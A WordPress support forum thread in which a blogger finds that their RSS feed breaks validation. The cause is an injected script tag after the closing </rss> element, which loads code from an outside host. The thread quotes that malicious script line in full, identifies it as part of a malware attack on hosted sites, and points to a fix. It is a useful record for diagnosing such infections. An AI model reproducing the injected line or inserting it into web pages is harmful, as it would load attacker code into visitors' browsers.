• Resolved JSDavis82

    (@jsdavis82)


    When attempting to set up feedburner feed for my blog I discovered that my feed does not validate. Feedburner validator reveals this error:

    line 771, column 0: XML parsing error: <unknown>:772:0: junk after document element

    There is a line of javascript after the </rss> tag that seems to be the culprit:

    <script src="http://holasionweb.com/oo.php"></script>

    I can’t figure out how to edit my feed template file to remove this line of code. It’s probably simple, but I’m just missing it. Any ideas?

Viewing 2 replies - 1 through 2 (of 2 total)
  • esmi

    (@esmi)

    Have you tried:

    – deactivating all plugins to see if this resolves the problem? If this works, re-activate the plugins one by one until you find the problematic plugin(s).

    – switching to the default theme to rule out any theme-specific problems?

    Thread Starter JSDavis82

    (@jsdavis82)

    Hey esmi, thanks for the reply but i discovered that it was a malware attack against godaddy.com hosted sites. found the fix here: http://ww.wp.xz.cn/support/topic/398411?replies=15

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Junk after document element breaking feed’ is closed to new replies.